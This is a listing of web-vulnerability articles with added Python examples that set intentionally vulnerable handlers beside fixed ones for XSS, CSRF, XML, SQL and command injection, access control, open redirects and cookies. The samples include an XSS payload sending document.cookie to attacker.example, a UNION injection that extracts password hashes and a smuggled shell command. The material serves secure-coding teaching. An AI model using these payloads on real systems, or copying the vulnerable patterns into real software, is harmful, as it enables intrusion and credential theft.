Showing 16 articles

#1

Cross-Site Scripting



A web application's output is rendered as a web page. If user input is included in the web application output, then it is also rendered as a part of the web page. If user input is included in output w...
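Added example (not code from the original page): the two rendering paths the teaser describes, in Python. The attacker strings, the function names and the crude `has_live_markup` check are constructed for this illustration; `html.escape` is the standard-library entity encoder. The attribute-context pair shows why the encoder must also be paired with a quoted attribute.

```python
import html

# Constructed sample input: a display name an attacker might submit.
ATTACKER_NAME = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
# Constructed payload for an attribute context: closes the value, adds an event handler.
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(1)'


def render_greeting_vulnerable(name: str) -> str:
    """Interpolates user input straight into an HTML text context.

    The attacker's <script> element becomes part of the page and runs.
    """
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    """Entity-encodes the input for an HTML text context.

    '<' becomes '&lt;', so the browser shows the characters instead of
    parsing them as markup.
    """
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_attribute_vulnerable(name: str) -> str:
    """Quoted attribute context with no encoding: a '"' in the input closes the value."""
    return f'<input type="text" name="display_name" value="{name}">'


def render_attribute_safe(name: str) -> str:
    """Quoted attribute context: encode with quote=True so '"' becomes '&quot;'.

    The attribute must actually be quoted; encoding alone does not help an
    unquoted attribute, where a space already ends the value.
    """
    return f'<input type="text" name="display_name" value="{html.escape(name, quote=True)}">'


def has_live_markup(rendered: str) -> bool:
    """Crude detector used only to show the difference between the renderings.

    It looks for an unescaped <script> start tag or an unescaped, quoted
    event-handler attribute; it is not a real XSS scanner.
    """
    lowered = rendered.lower()
    return "<script" in lowered or 'onfocus="' in lowered
```

`html.escape` is the right encoder for HTML text and quoted-attribute contexts only; input placed inside a `<script>` block, a URL, or a CSS value needs the encoding rules of that context instead.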

#2

Insecure Direct Object References



Insecure direct object reference vulnerabilities occur when an application exposes the system names of system resources that it uses and allows an attacker to manipulate these names. If an attacker ca...

#3

Insufficient Authentication



Insufficient authentication vulnerabilities occur when the application allows users to perform sensitive operations or access sensitive information without properly checking their authentication crede...

#4

Insufficiently Protected Credentials



An insufficiently protected credential weakness occurs when the application doesn't store or transmit the authentication credentials securely. If the passwords are not hashed and salted, an attacker m...

#5

Code Injection



Scripting languages often have functions, such as eval(), that allow interpreting a string or a file as a part of the application. The danger of using these functions is that, under certain conditions...

#6

Cross-Site Request Forgery



A cross-site request forgery (CSRF) attack occurs when an attacker tricks a victim into loading a page that contains a malicious request. This request might be able to change the state of the web appl...
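Added example (not code from the original page): a change-email handler that acts on the session cookie alone, beside one that also requires a per-session synchronizer token, in Python. The in-memory session store, the attacker's forged form body and the function names are all constructed for this illustration.

```python
import hmac
import secrets
from typing import Callable, Dict, Tuple

# Constructed in-memory session store: session id -> session data.
SESSIONS: Dict[str, dict] = {}


def start_session(email: str) -> str:
    """Create a session and mint a random CSRF token alongside it."""
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"email": email, "csrf_token": secrets.token_urlsafe(32)}
    return session_id


def csrf_token_for(session_id: str) -> str:
    """The token the genuine form embeds as a hidden field.

    An attacker's page cannot obtain it: the same-origin policy stops it reading
    our responses, and the token is not a cookie the browser would attach by itself.
    """
    return SESSIONS[session_id]["csrf_token"]


def current_email(session_id: str) -> str:
    return SESSIONS[session_id]["email"]


def change_email_vulnerable(session_id: str, form: dict) -> str:
    """Trusts the session cookie alone. A form auto-submitted from another
    origin carries that cookie, so the forged request is honoured."""
    SESSIONS[session_id]["email"] = form["email"]
    return SESSIONS[session_id]["email"]


def change_email(session_id: str, form: dict) -> str:
    """Synchronizer-token check before the state change."""
    session = SESSIONS.get(session_id)
    if session is None:
        raise PermissionError("not authenticated")
    submitted = form.get("csrf_token", "")
    # Constant-time comparison; a missing field compares as "" and fails.
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        raise PermissionError("CSRF token missing or invalid")
    session["email"] = form["email"]
    return session["email"]


def forged_request_outcome(handler: Callable[[str, dict], str]) -> Tuple[bool, str]:
    """Simulate the cross-site request against a fresh victim session.

    The browser attaches the victim's session id; the attacker-controlled form
    body has no token. Returns (request accepted?, email afterwards).
    """
    session_id = start_session("victim@example.com")          # constructed victim
    forged_form = {"email": "attacker@attacker.example"}       # constructed payload
    try:
        handler(session_id, forged_form)
    except PermissionError:
        return False, current_email(session_id)
    return True, current_email(session_id)


def legitimate_change(new_email: str) -> str:
    """The genuine flow: the form rendered by our site includes the token."""
    session_id = start_session("victim@example.com")
    form = {"email": new_email, "csrf_token": csrf_token_for(session_id)}
    return change_email(session_id, form)
```

The token must be bound to the session rather than shared site-wide, and it only protects handlers that check it; setting the session cookie with `SameSite=Lax` and checking the `Origin` header are worthwhile additional layers, not replacements.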

#7

XML Injection



XML injection occurs when an attacker is able to supply data to the application that is interpreted as a part of an XML document in a manner that violates the intended use of XML by the application. X...
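Added example (not code from the original page): a user record built by string concatenation, beside the same record built with the XML API so the input stays data, in Python. The attacker string, the `<user>` document shape and the `effective_role` consumer are constructed for this illustration.

```python
import xml.etree.ElementTree as ET

# Constructed attacker input: closes the <name> element and injects a <role> of its own.
PAYLOAD = "mallory</name><role>admin</role><name>x"


def build_user_xml_vulnerable(name: str) -> str:
    """String concatenation: the input's angle brackets become markup.

    With PAYLOAD the result is still well-formed XML, so nothing downstream
    notices; the injected <role> simply comes first.
    """
    return f"<user><name>{name}</name><role>user</role></user>"


def build_user_xml_safe(name: str) -> str:
    """Build the tree with the XML API; text is escaped on serialisation,
    so '<' in the input becomes '&lt;' and stays character data."""
    user = ET.Element("user")
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "role").text = "user"
    return ET.tostring(user, encoding="unicode")


def effective_role(document: str) -> str:
    """What a downstream consumer sees: the first <role> child of <user>."""
    root = ET.fromstring(document)
    return root.find("role").text


def stored_name(document: str) -> str:
    """The name as the consumer reads it back."""
    return ET.fromstring(document).find("name").text
```

The same rule applies to any structured format the application assembles from input: build it with the format's API or escape for that format, never by pasting strings. Parsing attacker-supplied XML raises separate concerns (entity expansion, external entities) that this example does not address.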

#8

LDAP Injection



Lightweight Directory Access Protocol (LDAP) is a widely used protocol for accessing directory services. Directories provide a set of attributes about people that are organized in a hierarchical manne...

#9

Insecure Transport



TLS should be used to protect any sensitive data in transit. Some applications don't use TLS even during authentication or when transmitting sensitive data, and an attacker might be able to intercept...

#10

Open Redirect



Many web applications use URL redirection to direct a user to another site or page on the same site. Some web sites make it possible to manipulate the destination of the URL redirection. An attacker m...
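Added example (not code from the original page): validating a `next`-style redirect parameter so that it can only lead to a site-relative path or to an allow-listed https host, in Python. The allowed host, the fallback path and the function name are constructed for this illustration; the parser-confusion cases it rejects (`//host`, `///host`, `/\host`, userinfo before `@`, embedded whitespace) are the ones that commonly turn an "internal" redirect into an open one.

```python
from typing import Iterable
from urllib.parse import urlsplit

# Constructed: the hosts this application may send users to.
ALLOWED_HOSTS = frozenset({"app.example.com"})
FALLBACK = "/"


def safe_redirect_target(target: str, allowed_hosts: Iterable[str] = ALLOWED_HOSTS,
                         fallback: str = FALLBACK) -> str:
    """Return target if it stays on an allowed host, else the fallback.

    Accepts two shapes only: a site-relative path ("/account?x=1") or an https
    URL whose hostname is allow-listed. Everything else, including the
    scheme-relative "//evil", the backslash variant "/\\evil" and
    "javascript:" URLs, is replaced by the fallback.
    """
    if not target:
        return fallback
    # urlsplit silently strips some control characters before parsing and
    # browsers tolerate others; refuse them all rather than reason about it.
    if any(ch.isspace() or ord(ch) < 0x20 for ch in target) or "\\" in target:
        return fallback
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Relative reference: must be an absolute path. "//host" parses as an
        # authority, and browsers read "///host" as one too, so both are refused.
        if target.startswith("/") and not target.startswith("//"):
            return target
        return fallback
    # Absolute URL: https only, exact hostname match, no userinfo tricks.
    if parts.scheme != "https" or parts.hostname is None:
        return fallback
    if parts.username is not None or parts.password is not None:
        return fallback
    if parts.hostname not in set(allowed_hosts):
        return fallback
    return target
```

An allow-list of hosts (or, simpler still, of named destinations mapped to paths server-side) is the check that holds up; a deny-list of known bad prefixes or a `startswith("https://app.example.com")` test does not, as the `app.example.com.evil.example` and `app.example.com@evil.example` cases show.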

#11

Command Injection



Applications often execute external commands as a part of their functionality. If the attacker is able to manipulate the choice of external commands or their parameters, the attacker will be able to a...
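Added example (not code from the original page): a "look up this host" feature that hands a string to the shell, beside the argv-list form that never involves a shell, in Python. The payload, the hostname pattern and the `echo`-based demonstration are constructed for this illustration; `nslookup` is only named in the argv, not executed here.

```python
import re
import shlex
import subprocess
from typing import List

# Constructed attacker input for a "look up this host" feature.
PAYLOAD = "example.com; echo PWNED"

# Simplified hostname rule: dot-separated labels of letters, digits and hyphens,
# with no label starting with "-". The last point also stops the value from
# being parsed by the invoked program as a command-line option.
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(\.(?!-)[A-Za-z0-9-]{1,63})*\.?$")


def is_valid_hostname(host: str) -> bool:
    return HOSTNAME_RE.match(host) is not None


def build_command_vulnerable(host: str) -> str:
    """Command string handed to a shell: ';', '|', '$(...)' and backticks in
    host are interpreted by the shell, not passed to the program."""
    return "nslookup " + host


def build_argv(host: str) -> List[str]:
    """Argument vector with no shell in between: the input is one argv element,
    whatever characters it contains. Validation is still done, because a value
    beginning with '-' would be read by the program as an option (argument
    injection, a separate problem from shell injection)."""
    if not is_valid_hostname(host):
        raise ValueError(f"not a hostname: {host!r}")
    return ["nslookup", host]


def echo_vulnerable(text: str) -> str:
    """The shell path, demonstrated with a harmless command: the injected
    second command runs and prints its own line."""
    return subprocess.run("echo " + text, shell=True, capture_output=True, text=True).stdout


def echo_safe(text: str) -> str:
    """Same input via an argv list: echo receives it as one argument and
    prints it literally."""
    return subprocess.run(["echo", text], capture_output=True, text=True).stdout


def quoted_for_shell(host: str) -> str:
    """If a shell really is unavoidable, shlex.quote() turns the value into a
    single shell word. Prefer argv lists all the same."""
    return "nslookup " + shlex.quote(host)
```

`echo_vulnerable` and `echo_safe` need a POSIX shell and `/bin/echo`; they exist only to make the difference visible with a command that cannot do harm.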

#12

Insufficient Authorization



Insufficient authorization vulnerabilities occur when the application allows a user to perform an action without checking if the user has sufficient privileges to carry it out. This allows attackers t...
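Added example (not code from the original page) covering three of the entries above together: #2 (insecure direct object references), #3 (insufficient authentication) and #12 (insufficient authorization). It is an invoice endpoint in Python with an in-memory session store and sequential invoice ids, all constructed for this illustration; the first handler has none of the checks, the others add authentication, an object-level ownership check and a separate role check for the privileged action.

```python
from typing import Dict


class Unauthenticated(Exception):
    """No valid session: the caller has not proven who they are."""


class Forbidden(Exception):
    """Valid session, but this user may not perform this action."""


class NotFound(Exception):
    """Object does not exist, or exists but is not visible to this user."""


# Constructed sample data. Invoice ids are sequential integers, exactly the
# kind of predictable reference an attacker can enumerate.
SESSIONS: Dict[str, dict] = {
    "tok-alice": {"user": "alice", "role": "user"},
    "tok-bob": {"user": "bob", "role": "user"},
    "tok-carol": {"user": "carol", "role": "admin"},
}
INVOICES: Dict[int, dict] = {
    1001: {"owner": "alice", "total": 42.0},
    1002: {"owner": "bob", "total": 99.5},
}


def get_invoice_vulnerable(invoice_id: int) -> dict:
    """Insufficient authentication plus IDOR: no session is required and the
    record goes to whoever supplies its id."""
    return INVOICES[invoice_id]


def authenticate(headers: dict) -> dict:
    """Map a bearer token to a session, or refuse. Every sensitive handler
    calls this first."""
    token = headers.get("Authorization", "")
    if token.startswith("Bearer "):
        token = token[len("Bearer "):].strip()
    session = SESSIONS.get(token)
    if session is None:
        raise Unauthenticated("missing or invalid session token")
    return session


def get_invoice(headers: dict, invoice_id: int) -> dict:
    """Read an invoice: authenticate, then check the caller may see this object."""
    session = authenticate(headers)
    invoice = INVOICES.get(invoice_id)
    # Ownership check on the object itself. Raising the same NotFound for
    # "does not exist" and "not yours" stops the endpoint confirming which
    # ids are valid to an attacker walking the id space.
    if invoice is None or (session["role"] != "admin" and invoice["owner"] != session["user"]):
        raise NotFound(f"invoice {invoice_id}")
    return invoice


def delete_invoice(headers: dict, invoice_id: int) -> bool:
    """Privileged action: the role check is separate from ownership, so an
    owner who is not an admin still cannot delete."""
    session = authenticate(headers)
    if session["role"] != "admin":
        raise Forbidden("admin role required")
    if invoice_id not in INVOICES:
        raise NotFound(f"invoice {invoice_id}")
    del INVOICES[invoice_id]
    return True


def raises(exc_type, fn, *args) -> bool:
    """Demonstration helper: True if fn(*args) raises exc_type."""
    try:
        fn(*args)
    except exc_type:
        return True
    return False
```

The checks are deliberately done inside the handler rather than at a routing layer alone: the object-level decision depends on the specific record being fetched, which only the handler knows.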

#13

SQL Injection



SQL injection is a type of vulnerability in database access code that allows attackers to execute unauthorized queries on the database. SQL Injection vulnerabilities are caused by concatenating data...
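Added example (not code from the original page): a product search built by concatenation, beside the parameterised version, against an in-memory SQLite database in Python. The tables, rows, stored hash value and the UNION payload are constructed for this illustration.

```python
import sqlite3
from typing import List, Tuple

# Constructed attacker input for a product-search box. The leading quote ends
# the string literal, UNION grafts a second SELECT on, and "--" comments out
# whatever the application appends after the input.
PAYLOAD = "' UNION SELECT id, password_hash FROM users --"
STORED_HASH = "pbkdf2_sha256$600000$0011$aabb"   # constructed placeholder value


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        f"""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'desk lamp'), (2, 'standing desk');
        INSERT INTO users VALUES (1, 'admin', '{STORED_HASH}');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[Tuple]:
    """Data concatenated into the statement: the input becomes SQL.

    Note this is a single statement, so a driver that refuses stacked
    queries (as sqlite3.execute does) is no defence: UNION needs only one.
    """
    sql = f"SELECT id, name FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> List[Tuple]:
    """Parameterised query: the value travels separately from the statement
    text, so quotes in it are just characters.

    Parameters stop injection but do not neutralise LIKE's own wildcards, so
    '%' and '_' in the term are escaped as well.
    """
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT id, name FROM products WHERE name LIKE ? ESCAPE '\\'"
    return conn.execute(sql, (f"%{escaped}%",)).fetchall()


def leaked_hashes(rows: List[Tuple]) -> List[str]:
    """Rows whose 'name' column is actually a stored password verifier."""
    return [name for _, name in rows if isinstance(name, str) and name.startswith("pbkdf2_")]
```

The escaping in `search_safe` handles the LIKE wildcards only; it is the `?` placeholder that prevents the injection. The same shape applies to other drivers, with `%s` or `:name` placeholders, and the ORM equivalents do the same thing underneath.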

#14

Using Components with Known Vulnerabilities



“Using components with known vulnerabilities” refers to an application that uses third-party code that contains known vulnerabilities. The result is that the vulnerabilities in the third-party code be...

#15

Sensitive Cookie in HTTPS Session without Secure Attribute



When a cookie has the Secure attribute set, that cookie will not be sent over a non-encrypted connection. If the Secure attribute is not set on a sensitive cookie, the cookie will be sent in plaintext and...
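Added example (not code from the original page): a small audit of `Set-Cookie` headers for sensitive cookies missing `Secure` (and the related `HttpOnly` and `SameSite`), beside a builder that emits a correct header with the standard library's `SimpleCookie`, in Python. The sample headers and the list of cookie names treated as sensitive are constructed for this illustration.

```python
from http.cookies import SimpleCookie
from typing import List, Set, Tuple

# Constructed sample response headers to audit.
SAMPLE_HEADERS = [
    "Set-Cookie: sessionid=abc123; Path=/; HttpOnly",
    "Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
    "Set-Cookie: theme=dark; Path=/",
]
# Constructed: the cookie names this application treats as sensitive.
SENSITIVE_NAMES = frozenset({"sessionid", "csrftoken"})
REQUIRED = ("Secure", "HttpOnly", "SameSite")


def parse_set_cookie(header: str) -> Tuple[str, Set[str]]:
    """Return (cookie name, lower-cased attribute names) from one Set-Cookie line."""
    value = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs


def missing_attributes(header: str, sensitive: Set[str] = SENSITIVE_NAMES) -> List[str]:
    """Attributes a sensitive cookie lacks; empty for a correct header or a
    cookie that is not sensitive."""
    name, attrs = parse_set_cookie(header)
    if name.lower() not in sensitive:
        return []
    return [a for a in REQUIRED if a.lower() not in attrs]


def session_cookie_header(value: str) -> str:
    """Emit the session cookie with the attributes the audit expects."""
    cookie = SimpleCookie()
    cookie["sessionid"] = value
    morsel = cookie["sessionid"]
    morsel["path"] = "/"
    morsel["secure"] = True      # never sent over plaintext HTTP
    morsel["httponly"] = True    # not readable from document.cookie
    morsel["samesite"] = "Lax"   # not attached to most cross-site requests
    return cookie.output(header="Set-Cookie:")
```

Browsers additionally enforce the `__Host-` name prefix (the cookie must be set with `Secure`, from a secure origin, with `Path=/` and no `Domain`), which turns the `Secure` requirement from a server-side convention into something the client checks.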

#16

Cookieless Authentication



Most web applications use cookies to keep track of session state. Some applications use other mechanisms to keep track of authenticated sessions. These custom authentication schemes are usually vulner...